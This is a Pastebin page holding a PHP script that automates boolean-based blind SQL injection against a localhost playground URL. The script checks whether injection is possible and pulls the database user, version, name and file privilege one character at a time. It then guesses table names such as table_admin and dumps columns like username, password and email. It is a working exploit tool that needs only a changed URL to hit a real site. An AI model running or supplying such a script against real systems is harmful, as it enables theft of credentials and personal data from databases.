Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $url = "http://localhost/playground/sqli/blind/blind.php?comment=1";
- $tables = [
- "table_user",
- "table_content",
- "table_comment",
- "table_users",
- "table_member",
- "table_admin",
- "table_halaman"
- ];
- $columns = [
- "uname",
- "user",
- "name",
- "username",
- "password",
- "email",
- "id",
- "comment",
- "judul",
- "content"
- ];
- $datas = ["+",","];
- $datas = array_merge($datas,range("~","-"));
- sort($datas);
- //list of query
- $query1 = array("+and+false","+and+true");
- $query2 = array("user()","version()","database()","(SELECT+file_priv+FROM+mysql.user+LIMIT+0,1)");
- //test for sql injection
- $req1 = file_get_contents($url . $query1[0]);
- $req2 = file_get_contents($url . $query1[1]);
- if($req1 !== $req2){
- echo "\n[+] probably, it's possible to blind sql injection\n";
- }else{
- die("\n[-] we're not sure that it's possible to blind sql injection\n");
- }
- //checking version,user,and database name
- echo "[+] we're looking for common information of it's database\n";
- foreach($query2 as $x){
- if($x == "(SELECT+file_priv+FROM+mysql.user+LIMIT+0,1)"){
- echo "\n[*] FILE_PRIV\t: ";
- }else{
- $zz = strtoupper(str_replace("()","",$x));
- echo "\n[*] {$zz}\t: ";
- }
- for($itung = 1; $itung <= 20; $itung++):
- foreach($datas as $z){
- $query = "+and+BINARY+substring({$x},{$itung},1)='{$z}'";
- $req = file_get_contents($url . $query);
- if($req === $req2):
- echo $z;
- break;
- endif;
- }
- sleep(0.30);
- endfor;
- }
- echo "\n\n";
- $table_found = array();
- echo "[+] we are looking for table name\n\n";
- foreach($tables as $x){
- $query = "+and+(SELECT+1+FROM+{$x}+LIMIT+0,1)=1";
- $req = file_get_contents($url . $query);
- if($req === $req2):
- echo "[*] {$x}\n";
- $table_found[] = $x;
- endif;
- }
- echo "\n";
- echo "[+] dumping the whole of datas of all the tables\n\n";
- foreach($table_found as $x){
- echo "[+] from table {$x}\n\n";
- foreach($columns as $z){
- $query = "+AND+(SELECT+SUBSTRING(CONCAT(1,{$z}),1,1)+FROM+{$x}+LIMIT+0,1)=1";
- $req = file_get_contents($url . $query);
- if($req === $req2):
- echo "[*] {$z}\t : ";
- for($xx = 1;$xx <= 100; $xx++):
- foreach($datas as $zz){
- $query1 = "+and+BINARY+substring((SELECT+group_concat({$z})+FROM+{$x}),{$xx},1)='{$zz}'";
- $req = file_get_contents($url . $query1);
- if($req === $req2):
- if($zz === "+"):
- $zz = " ";
- endif;
- echo $zz;
- break;
- endif;
- }
- endfor;
- echo "\n";
- endif;
- }
- echo "\n";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement